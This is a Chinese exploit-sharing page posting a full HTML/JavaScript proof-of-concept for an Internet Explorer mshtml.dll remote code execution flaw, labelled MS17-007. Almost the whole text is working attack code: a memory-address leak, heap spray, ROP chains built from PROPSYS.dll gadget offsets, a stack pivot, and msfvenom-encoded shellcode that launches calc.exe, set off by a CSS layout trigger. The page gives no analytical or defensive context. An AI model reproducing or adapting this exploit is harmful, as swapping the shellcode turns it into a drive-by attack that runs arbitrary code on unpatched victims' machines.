当前位置:首页 > POC 2017年08月25日
Microsoft Internet Explorer - mshtml.dll远程执行代码(MS17-007)exploit

<!DOCTYPE html>
<html>
<head>
    <style>
        .class1 { float: left; column-count: 5; }
        .class2 { column-span: all; columns: 1px; }
        table {border-spacing: 0px;}
    </style>
    <script>
  
    var base_leaked_addr = "";
  
    function infoleak() {
      
        var textarea = document.getElementById("textarea");
        var frame = document.createElement("iframe");
       
        textarea.appendChild(frame);
        frame.contentDocument.onreadystatechange = eventhandler;
  
        form.reset();
          
    }
       
    function eventhandler() {
      

        document.getElementById("textarea").defaultValue = "foo";


        //替换对象
      
        var audioElm = document.createElement("audio");
            audioElm.src = "test.mp3";
                  
    }
      
    function writeu(base, offs) {
      
        var res = 0;
        if (base != 0) {  res = base + offs }
        else {  res = offs }
        res = res.toString(16);
        while (res.length < 8) res = "0"+res;
        return "%u"+res.substring(4,8)+"%u"+res.substring(0,4);
          
    }
      
    function readu(value) {
                  
        var uc = escape(value);
        var ucsplit = uc.split('%');
        var res = parseInt('0x' + ucsplit[2].replace('u', '') + ucsplit[1].replace('u', ''));
        return res;
          
    }
          
    function spray() {
      
        // DEPS 避免空字符
  
        var hso = document.createElement("div");
        base_leaked_addr = parseInt(base_leaked_addr,16);
  
        var junk = unescape("%u0e0e%u0e0e");
        while (junk.length < 0x1000) junk += junk;
  
  
        var rop = unescape(
            writeu(base_leaked_addr,0x56341) +
            writeu(base_leaked_addr,0x56341) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(0,0xffffffff) +
            writeu(base_leaked_addr,0x2a89e) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x4e385) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x2030f) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            writeu(0,0xf07645d5) +
            writeu(base_leaked_addr,0x6e002) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0xaebc) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(0,0xffffffbf) +
            writeu(base_leaked_addr,0x2a89e) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x6361b) +
            writeu(base_leaked_addr,0x432cf) +
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(base_leaked_addr,0x5cef1) +
            writeu(base_leaked_addr,0x4177e) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(base_leaked_addr,0x1244) +
            writeu(base_leaked_addr,0xa819) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x2720b) +
            "" );
  
       
          
          
        // 将ESP移动到 VirtualAlloc ROP
        var stack_shift_rop = unescape(
            writeu(0,235802130) +
            writeu(base_leaked_addr,0x2030f) + // 0x6af5030f :  # POP EBX # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x0e0e1258) +
            writeu(base_leaked_addr,0x28002) +  // 0x6af58002 :  # MOV EAX,EBX # POP EBX # POP EBP # RETN 0x08    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x0b473) + //0x6af3b473 :  # XCHG EAX,ESP # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            "");
          
          
          
  
        // root@kali:~# msfvenom  -p windows/exec cmd=calc.exe -b "\x00" -f js_le
        // ~2854 bytes max
          
        var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption
                "%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" +
        "");
      
          
        var xchg = unescape(writeu(base_leaked_addr, 0x0b473));  // Initial EIP control ---> 0x6af3b473 :  # XCHG EAX,ESP # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
        var fix1 = 0x15c;
        var fixop = unescape("%u0e0e%u0e0e");
        var offset_to_stack_shift = 0x6f7;
        var offset_to_xchg = 0xd2+2;
        
        data = junk.substring(0,fix1-rop.length) + rop + fixop + shellcode + junk.substring(0,offset_to_stack_shift-fix1-fixop.length-shellcode.length) + stack_shift_rop + junk.substring(0,offset_to_xchg-stack_shift_rop.length) + xchg;
        data += junk.substring(0,0x800-offset_to_stack_shift-offset_to_xchg-xchg.length);
      
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x350; i++)
        {
            var obj = document.createElement("button");
            obj.title = data.substring(0,(0x7fb00-2)/2);
            hso.appendChild(obj);
        }
    }
  
    function boom() {
        document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
        th1.align = "right";
    }
      
    setTimeout(function() {
  
        var txt = document.getElementById("textarea");
        var il = txt.value.substring(0,2);
        var leaked_addr = readu(il);
        base_leaked_addr = leaked_addr - 0xbacc; // base of propsys
        base_leaked_addr = base_leaked_addr.toString(16);
        spray();
        boom();
          
    }, 1000);
    </script>
</head>
  
<body onload=infoleak()>
    <form id="form">
        <textarea id="textarea" style="display:none" cols="81">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</textarea>
    </form>
<script>
  
</script>
    <table cellspacing="0">
        <tr class="class1">
        <th id="th1" colspan="0" width=2000000></th>
        <th class="class2" width=0><div class="class2"></div></th>
    </table>
</body>
</html>



发表评论: